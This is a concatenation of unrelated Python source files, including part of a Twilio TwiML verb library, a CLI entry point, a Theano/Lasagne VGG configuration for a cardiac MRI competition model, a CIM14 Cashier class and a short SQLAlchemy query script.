        """Create an :class:`Sms` verb, nest it in this response and
        return it."""
        verb = Sms(msg, **kwargs)
        return self.append(verb)

    # All add* methods are deprecated aliases kept for backwards
    # compatibility; prefer the lowercase factory methods above.
    def addSay(self, *args, **kwargs):
        return self.say(*args, **kwargs)

    def addPlay(self, *args, **kwargs):
        return self.play(*args, **kwargs)

    def addPause(self, *args, **kwargs):
        return self.pause(*args, **kwargs)

    def addRedirect(self, *args, **kwargs):
        return self.redirect(*args, **kwargs)

    def addHangup(self, *args, **kwargs):
        return self.hangup(*args, **kwargs)

    def addReject(self, *args, **kwargs):
        return self.reject(*args, **kwargs)

    def addGather(self, *args, **kwargs):
        return self.gather(*args, **kwargs)

    def addDial(self, *args, **kwargs):
        return self.dial(*args, **kwargs)

    def addRecord(self, *args, **kwargs):
        return self.record(*args, **kwargs)

    def addSms(self, *args, **kwargs):
        return self.sms(*args, **kwargs)
class Say(Verb):
    """The :class:`Say` verb converts text to speech that is read back to the
    caller.
    :param voice: allows you to choose a male or female voice to read text
                  back.
    :param language: allows you pick a voice with a specific language's accent
                     and pronunciations. Twilio currently supports languages
                     'en' (English), 'es' (Spanish), 'fr' (French), 'de'
                     (German) and 'en-gb' (English, Great Britain).
    :param loop: specifies how many times you'd like the text repeated.
                 Specifying '0' will cause the :class:`Say` verb to loop
                 until the call is hung up.
    """
    # Convenience constants for the voice/language parameters.
    MAN = 'man'
    WOMAN = 'woman'
    ENGLISH = 'en'
    BRITISH = 'en-gb'
    SPANISH = 'es'
    FRENCH = 'fr'
    GERMAN = 'de'
    def __init__(self, text, **kwargs):
        super(Say, self).__init__(**kwargs)
        # The text to speak becomes the element's body.
        self.body = text
class Play(Verb):
    """Play an audio file at a URL
    :param url: points to an audio file. The MIME type on the file must be
                set correctly.
    :param loop: specifies how many times you'd like the audio repeated.
                 Specifying '0' will cause the :class:`Play` verb to loop
                 until the call is hung up. Defaults to 1.
    """
    def __init__(self, url, **kwargs):
        super(Play, self).__init__(**kwargs)
        # The audio URL becomes the element's body.
        self.body = url
class Pause(Verb):
    """Pause the call
    :param length: specifies how many seconds Twilio will wait silently before
                   continuing on.
    """
class Redirect(Verb):
    """Redirect call flow to another URL
    :param url: specifies the url which Twilio should query to retrieve new
                TwiML. The default is the current url
    :param method: specifies the HTTP method to use when retrieving the url
    """
    GET = 'GET'
    POST = 'POST'
    def __init__(self, url="", **kwargs):
        super(Redirect, self).__init__(**kwargs)
        # The target URL becomes the element's body.
        self.body = url
class Hangup(Verb):
    """Hangup the call
    """
class Reject(Verb):
    """Reject an incoming call without answering it.
    :param reason: rejection reason reported to the caller -- NOTE(review):
                   the accepted values are not shown here; confirm against
                   the Twilio <Reject> documentation.
    """
class Gather(Verb):
    """Gather digits from the caller's keypad
    :param action: URL to which the digits entered will be sent
    :param method: submit to 'action' url using GET or POST
    :param numDigits: how many digits to gather before returning
    :param timeout: wait for this many seconds before returning
    :param finishOnKey: key that triggers the end of caller input
    """
    GET = 'GET'
    POST = 'POST'
    # Only prompt verbs may be nested while gathering input.
    nestables = ['Say', 'Play', 'Pause']
    def __init__(self, **kwargs):
        super(Gather, self).__init__(**kwargs)
    def say(self, text, **kwargs):
        # Nest a Say prompt inside this Gather.
        return self.append(Say(text, **kwargs))
    def play(self, url, **kwargs):
        # Nest a Play prompt inside this Gather.
        return self.append(Play(url, **kwargs))
    def pause(self, **kwargs):
        # Nest a Pause inside this Gather.
        return self.append(Pause(**kwargs))
    # Deprecated aliases kept for backwards compatibility.
    def addSay(self, *args, **kwargs):
        return self.say(*args, **kwargs)
    def addPlay(self, *args, **kwargs):
        return self.play(*args, **kwargs)
    def addPause(self, *args, **kwargs):
        return self.pause(*args, **kwargs)
class Number(Verb):
    """Specify phone number in a nested Dial element.
    :param number: phone number to dial
    :param sendDigits: key to press after connecting to the number
    """
    def __init__(self, number, **kwargs):
        super(Number, self).__init__(**kwargs)
        # The phone number becomes the element's body.
        self.body = number
class Client(Verb):
    """Specify a client name to call in a nested Dial element.
    :param name: Client name to connect to
    """
    def __init__(self, name, **kwargs):
        super(Client, self).__init__(**kwargs)
        # The client name becomes the element's body.
        self.body = name
class Sms(Verb):
    """ Send a Sms Message to a phone number
    :param to: whom to send message to
    :param sender: whom to send message from (serialized as the "from"
                   XML attribute by the base class).
    :param action: url to request after the message is queued
    :param method: submit to 'action' url using GET or POST
    :param statusCallback: url to hit when the message is actually sent
    """
    GET = 'GET'
    POST = 'POST'
    def __init__(self, msg, **kwargs):
        super(Sms, self).__init__(**kwargs)
        # The message text becomes the element's body.
        self.body = msg
class Conference(Verb):
    """Specify conference in a nested Dial element.
    :param name: friendly name of conference
    :param bool muted: keep this participant muted
    :param bool beep: play a beep when this participant enters/leaves
    :param bool startConferenceOnEnter: start conf when this participant joins
    :param bool endConferenceOnExit: end conf when this participant leaves
    :param waitUrl: TwiML url that executes before conference starts
    :param waitMethod: HTTP method for waitUrl GET/POST
    """
    GET = 'GET'
    POST = 'POST'
    def __init__(self, name, **kwargs):
        super(Conference, self).__init__(**kwargs)
        # The conference name becomes the element's body.
        self.body = name
class Dial(Verb):
    """Dial another phone number and connect it to this call
    :param action: submit the result of the dial to this URL
    :param method: submit to 'action' url using GET or POST
    :param int timeout: The number of seconds to waits for the called
                        party to answer the call
    :param bool hangupOnStar: Allow the calling party to hang up on the
                              called party by pressing the '*' key
    :param int timeLimit: The maximum duration of the Call in seconds
    :param callerId: The caller ID that will appear to the called party
    :param bool record: Record both legs of a call within this <Dial>
    """
    GET = 'GET'
    POST = 'POST'
    nestables = ['Number', 'Conference', 'Client']
    def __init__(self, number=None, **kwargs):
        super(Dial, self).__init__(**kwargs)
        # A comma-separated list of numbers becomes nested <Number>
        # elements; a single number is used as the element's body.
        if number and len(number.split(',')) > 1:
            for n in number.split(','):
                self.append(Number(n.strip()))
        else:
            self.body = number
    def client(self, name, **kwargs):
        # Nest a Client target inside this Dial.
        return self.append(Client(name, **kwargs))
    def number(self, number, **kwargs):
        # Nest a Number target inside this Dial.
        return self.append(Number(number, **kwargs))
    def conference(self, name, **kwargs):
        # Nest a Conference target inside this Dial.
        return self.append(Conference(name, **kwargs))
    # Deprecated aliases kept for backwards compatibility.
    def addNumber(self, *args, **kwargs):
        return self.number(*args, **kwargs)
    def addConference(self, *args, **kwargs):
        return self.conference(*args, **kwargs)
class Record(Verb):
    """Record audio from caller
    :param action: submit the result of the record to this URL
    :param method: submit to 'action' url using GET or POST
    :param maxLength: maximum number of seconds to record
    :param timeout: seconds of silence before considering the recording done
    """
    GET = 'GET'
    POST = 'POST'
|
"""
.. module:: __main__
:platform: linux
:synopsis: Special main entry point.
.. moduleauthor:: Paul Fanelli <paul.fanelli@gmail.com>
.. modulecreated:: 6/28/15
"""
import sys
from planet_alignment.app.app_factory import AppFactory
from planet_alignment.cmd.cmd_parser import CommandParser
def main(argv=None):
    """Parse the command line, build the application and run it.

    :param argv: argument list; defaults to ``sys.argv[1:]`` when None.
    """
    args = sys.argv[1:] if argv is None else argv
    parsed = CommandParser().parse(args)
    application = AppFactory(parsed).create()
    results = application.run()
    if results:
        application.print_results(results)
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
|
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
rng = np.random
# Debugging switches.
take_a_dump = False  # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False  # dump the outputs from the dataloader (for debugging)
caching = None
# Training schedule: validate/save every N epochs.
validate_every = 10
validate_train_set = True
save_every = 10
restart_from_save = False
# NOTE(review): duplicate assignment -- dump_network_loaded_data was already
# set to False above.
dump_network_loaded_data = False
batch_size = 32
sunny_batch_size = 4
batches_per_chunk = 16
AV_SLICE_PER_PAT = 11
num_epochs_train = 80 * AV_SLICE_PER_PAT
# Learning rate: constant, then divided by 10 for the final 10% of training.
base_lr = .0001
learning_rate_schedule = {
    0: base_lr,
    9*num_epochs_train/10: base_lr/10,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Data cleaning steps applied before/after the main preprocessing.
cleaning_processes = [
    preprocess.set_upside_up,]
cleaning_processes_post = [
    functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
# Augmentation ranges, each as a (min, max) interval, for training...
augmentation_params = {
    "rotation": (-180, 180),
    "shear": (0, 0),
    "translation": (-8, 8),
    "flip_vert": (0, 1),
    "roll_time": (0, 0),
    "flip_time": (0, 0),
    "zoom_x": (.75, 1.25),
    "zoom_y": (.75, 1.25),
    "change_brightness": (-0.3, 0.3),
}
# ...and slightly narrower ranges for test-time augmentation.
augmentation_params_test = {
    "rotation": (-180, 180),
    "shear": (0, 0),
    "translation": (-8, 8),
    "flip_vert": (0, 1),
    "roll_time": (0, 0),
    "flip_time": (0, 0),
    "zoom_x": (.80, 1.20),
    "zoom_y": (.80, 1.20),
    "change_brightness": (-0.2, 0.2),
}
use_hough_roi = True
# Preprocessing functions for the train/validation/test pipelines.
preprocess_train = functools.partial(  # normscale_resize_and_augment has a bug
    preprocess.preprocess_normscale,
    normscale_resize_and_augment_function=functools.partial(
        image_transform.normscale_resize_and_augment_2,
        normalised_patch_size=(80,80)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Batch generators for each data split.
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
image_size = 64
# Expected tensor shapes for each named input.
data_sizes = {
    "sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
    "sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
    "sliced:data:singleslice": (batch_size, 30, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
    "sliced:data:ax": (batch_size, 30, 15, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
    "sliced:data:shape": (batch_size, 2,),
    "sunny": (sunny_batch_size, 1, image_size, image_size)
    # TBC with the metadata
}
# L2 regularization weights (disabled).
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
    """Build the training objective for this model.

    Applies a weighted L2 penalty over the layers listed under
    ``interface_layers["regularizable"]`` (a {layer: weight} mapping) and
    wraps the model outputs in the Kaggle competition objective.

    :param interface_layers: dict returned by build_model.
    :return: an objectives.KaggleObjective instance.
    """
    weighted_l2 = nn.regularization.regularize_layer_params_weighted(
        interface_layers["regularizable"],
        nn.regularization.l2,
    )
    return objectives.KaggleObjective(
        interface_layers["outputs"],
        penalty=weighted_l2,
    )
# Rebinds the module name "postprocess" to its postprocess function.
postprocess = postprocess.postprocess
test_time_augmentations = 100 * AV_SLICE_PER_PAT # More augmentations since we only use single slices
# Average TTA predictions: convert CDFs to PDFs, take the normalized
# geometric average, and cumulative-sum back into a CDF.
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
def lb_softplus(lb):
    """Return a softplus nonlinearity shifted up by a lower bound.

    :param lb: additive lower bound on the output.
    :return: callable mapping x to softplus(x) + lb.
    """
    def shifted_softplus(x):
        return nn.nonlinearities.softplus(x) + lb
    return shifted_softplus
def build_model(input_layer=None):
    """Build the single-slice VGG-style network with two distribution heads.

    A shared convolutional trunk (conv blocks of depth 2-2-3-3-3 with
    2x2 max-pooling between them) feeds two structurally identical dense
    heads, one for systole and one for diastole. Each head predicts a
    (mu, sigma) pair that MuSigmaErfLayer turns into a CDF output.

    :param input_layer: optional existing layer to use as the network input;
        when None, a fresh InputLayer is created from data_sizes.
    :return: dict with "inputs", "outputs", "regularizable" (layer -> L2
        weight) and "meta_outputs" entries.
    """
    def conv(incoming, num_filters):
        # 3x3 same-padded ReLU convolution with orthogonal init.
        return nn.layers.dnn.Conv2DDNNLayer(
            incoming, W=nn.init.Orthogonal("relu"), filter_size=(3,3),
            num_filters=num_filters, stride=(1,1), pad="same",
            nonlinearity=nn.nonlinearities.rectify)

    def halve(incoming):
        # 2x2 max-pooling, stride 2.
        return nn.layers.dnn.MaxPool2DDNNLayer(
            incoming, pool_size=(2,2), stride=(2,2))

    def dense(incoming, num_units, bias, nonlinearity):
        return nn.layers.DenseLayer(
            incoming, num_units=num_units, W=nn.init.Orthogonal("relu"),
            b=nn.init.Constant(bias), nonlinearity=nonlinearity)

    def head(incoming):
        # Two dropout-regularized 512-unit layers feeding a (mu, sigma) pair.
        # Layer construction order matches the original systole/diastole
        # blocks exactly (dropout layers draw RNG seeds at construction).
        h1 = dense(incoming, 512, 0.1, nn.nonlinearities.rectify)
        h1drop = nn.layers.dropout(h1, p=0.5)
        h2 = dense(h1drop, 512, 0.1, nn.nonlinearities.rectify)
        h2drop = nn.layers.dropout(h2, p=0.5)
        mu = dense(h2drop, 1, 200.0, None)
        sigma = dense(h2drop, 1, 50.0, lb_softplus(3))
        musigma = nn.layers.ConcatLayer([mu, sigma], axis=1)
        return h1, h2, mu, sigma, layers.MuSigmaErfLayer(musigma)

    #################
    # Regular model #
    #################
    if input_layer:
        l0 = input_layer
    else:
        l0 = nn.layers.InputLayer(data_sizes["sliced:data:singleslice"])

    # VGG-like trunk: (depth, width) per block, pooled after each block.
    net = l0
    for depth, width in [(2, 64), (2, 128), (3, 256), (3, 512), (3, 512)]:
        for _ in range(depth):
            net = conv(net, width)
        net = halve(net)

    # Systole head, then diastole head (same order as the original code).
    sys1, sys2, sys_mu, sys_sigma, l_systole = head(net)
    dia1, dia2, dia_mu, dia_sigma, l_diastole = head(net)

    return {
        "inputs":{
            "sliced:data:singleslice": l0
        },
        "outputs": {
            "systole": l_systole,
            "diastole": l_diastole,
        },
        "regularizable": {
            sys1: l2_weight,
            sys2: l2_weight,
            sys_mu: l2_weight_out,
            sys_sigma: l2_weight_out,
            dia1: l2_weight,
            dia2: l2_weight,
            dia_mu: l2_weight_out,
            dia_sigma: l2_weight_out,
        },
        "meta_outputs":{
            "systole:mu": sys_mu,
            "systole:sigma": sys_sigma,
            "diastole:mu": dia_mu,
            "diastole:sigma": dia_sigma,
            "systole": sys2,
            "diastole": dia2,
        }
    }
|
from CIM14.IEC61970.Core.IdentifiedObject import IdentifiedObject
class Cashier(IdentifiedObject):
    """The operator of the point of sale for the duration of CashierShift. Cashier is under the exclusive management control of Vendor.
    """
    def __init__(self, CashierShifts=None, electronicAddress=None, Vendor=None, *args, **kw_args):
        """Initialises a new 'Cashier' instance.
        @param CashierShifts: All shifts operated by this cashier.
        @param electronicAddress: Electronic address.
        @param Vendor: Vendor that manages this Cashier.
        """
        # Assigning through the public properties (not the _-prefixed slots)
        # so the bidirectional back-references are established.
        self._CashierShifts = []
        self.CashierShifts = [] if CashierShifts is None else CashierShifts
        self.electronicAddress = electronicAddress
        self._Vendor = None
        self.Vendor = Vendor
        super(Cashier, self).__init__(*args, **kw_args)
    # Class-level CIM metadata; presumably consumed by the framework's
    # (de)serialization machinery -- verify against the CIM14 base classes.
    _attrs = []
    _attr_types = {}
    _defaults = {}
    _enums = {}
    _refs = ["CashierShifts", "electronicAddress", "Vendor"]
    _many_refs = ["CashierShifts"]
    def getCashierShifts(self):
        """All shifts operated by this cashier.
        """
        return self._CashierShifts
    def setCashierShifts(self, value):
        # Detach all current shifts (clearing their back-reference via the
        # property), then attach the new ones.
        for x in self._CashierShifts:
            x.Cashier = None
        for y in value:
            # NOTE(review): writes the private _Cashier directly, so a shift
            # moved here from another cashier is not removed from that
            # cashier's list -- confirm this matches the generator's intent.
            y._Cashier = self
        self._CashierShifts = value
    CashierShifts = property(getCashierShifts, setCashierShifts)
    def addCashierShifts(self, *CashierShifts):
        # Attach each given shift; the Cashier property keeps both sides
        # of the association in sync.
        for obj in CashierShifts:
            obj.Cashier = self
    def removeCashierShifts(self, *CashierShifts):
        # Detach each given shift by clearing its back-reference.
        for obj in CashierShifts:
            obj.Cashier = None
    # Electronic address.
    electronicAddress = None
    def getVendor(self):
        """Vendor that manages this Cashier.
        """
        return self._Vendor
    def setVendor(self, value):
        # Remove self from the previous vendor's Cashiers list, then append
        # self to the new vendor's list (avoiding duplicates).
        if self._Vendor is not None:
            filtered = [x for x in self.Vendor.Cashiers if x != self]
            self._Vendor._Cashiers = filtered
        self._Vendor = value
        if self._Vendor is not None:
            if self not in self._Vendor._Cashiers:
                self._Vendor._Cashiers.append(self)
    Vendor = property(getVendor, setVendor)
|
from sqlalchemy_inventory_definition import session, OperatingSystem
# Print every OperatingSystem row in the inventory database.
for operating_system in session.query(OperatingSystem):
    print(operating_system)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.